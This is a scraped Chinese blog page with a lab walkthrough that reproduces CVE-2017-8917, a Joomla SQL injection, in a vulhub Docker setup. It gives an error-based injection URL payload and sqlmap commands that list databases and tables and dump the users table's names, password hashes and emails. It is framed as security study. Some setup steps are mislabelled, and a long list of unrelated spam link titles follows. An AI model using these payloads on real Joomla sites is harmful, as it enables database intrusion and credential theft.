当前位置: 首页 > news >正文

网站开发前的准备工作上海网站建设推

网站开发前的准备工作,上海网站建设推,企业系统管理软件有哪些,海安网站建设公司文章目录 搭建环境启动环境漏洞复现报错注入使用sqlmap 前提条件: 1.安装docker docker pull medicean/vulapps:j_joomla_22.安装docker-compose docker run -d -p 8000:80 medicean/vulapps:j_joomla_23.下载vulhub Docker Compose是 docker 提供的一个命令行工具&…

文章目录

  • 搭建环境
  • 启动环境
  • 漏洞复现
    • 报错注入
    • 使用sqlmap

前提条件:

1.安装docker

docker pull medicean/vulapps:j_joomla_2

2.安装docker-compose

docker run -d -p 8000:80 medicean/vulapps:j_joomla_2

3.下载vulhub

Docker Compose是 docker 提供的一个命令行工具,用来定义和运行由多个容器组成的应用,而docker-compose.yml是它的配置文件。

搭建环境

进入vulhb目录下的joomla,复现CVE-2017-8917漏洞:

cd /home/kali/vulhub/joomla/CVE-2017-8917

查看docker-compose的配置文件:

cat docker-compose.yml

如图,里面有两个镜像文件的信息,还有容器名字:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

然后使用下面命令,搭建docker-compose并启动:

docker-compose up -d && docker-compose up -d

如图:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

启动环境

环境搭建成功后,在浏览器中输入本机地址加之前配置文件中的端口10.9.75.45:8080进入Joomla环境:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

配置网站,输入用户名和密码,密码设为root,点击下一步:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

配置数据库账户密码,输入之前在配置文件中看到的数据库信息,点击下一步:

用户:root
密码:vulhub
数据库名:joomla

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

成功后点击安装,安装成功后点击删除installation目录(重要)

在这里插入图片描述

漏洞复现

报错注入

环境启动成功后刷新,页面跳转并出现报错信息,这时候可以用SQL注入中的报错注入来获取数据库信息,在URL中输入:

?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

成功回显当前用户名:

在这里插入图片描述

使用sqlmap

在kali中输入下面命令,获取数据库名,注入点为list:

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" --dbs

在弹出的交互式语句中直接回车,最后爆破出数据库名:
在这里插入图片描述

,输入下面命令,查看Joomla数据库中的表:

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla --tables

第一个交互选n,第二个直接回车,列出57个表名,其中比较重要的表示users:

在这里插入图片描述

查看users表中的内容:

–dump列表中指定列的内容

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" -D joomla -T '#__users' -C username,password,email --dump 

成功获得了用户名、加密的密码和之前输入的邮箱:

在这里插入图片描述

http://www.yayakq.cn/news/383938/

相关文章:

  • 佛山哪里做网站廊坊建设企业网站
  • 建造网站 备案网站正常打开速度
  • 网站建设的经营范围云南建设工程信息网站
  • 百度云虚拟主机如何建设网站宝山网站建设费用
  • 网站建设实验总结阿里云学生认证免费服务器
  • 南昌网站建设好么怎么在微信建立公众号
  • 建网站要注意的细节2023年网页游戏
  • php电子商务网站开发万表网欧米茄
  • 网站备案 工信部wordpress 管理密码忘记
  • 建设银行网站的特点分析国家高新技术企业申请条件
  • 网站开发小程序定制如何增加网站转化率
  • 兰州网站制作成都旅行网站建设方案策划书
  • 江苏省建设工程质量监督网站做网站送给女友意义
  • 奉贤品牌网站建设品牌设计图片
  • 公司已有网站 如何自己做推广重庆整合网络营销
  • 西安建站之家网络科技有限公司标准网站有哪些
  • 建设银行人力资源系统网站首页做英文网站挂谷歌广告
  • 网页设计跟做网站一样吗网站建设博采
  • 如何用asp做网站微信浏览为网站的缓存怎么清理
  • 网站建设意味着什么设计logo怎么设计
  • 做一个网站链接怎么做查询网
  • 有些中小网站wordpress wp rocket
  • 织梦cms发布侵权网站清单亿企邦网站建设
  • 网站设计工具有哪些网站倍攻击
  • 谷歌翻译接口 wordpress做seo必须有网站吗
  • 瑞安网站建设公司张家界网站制作与代运营
  • 主机域名网站源码百度权重站长工具
  • 无忧中英繁企业网站系统 破解律师个人 网站做优化
  • 知名购物网站有哪些网站建设发生的成本如何记账
  • 网站搭建外贸环评在那个网站做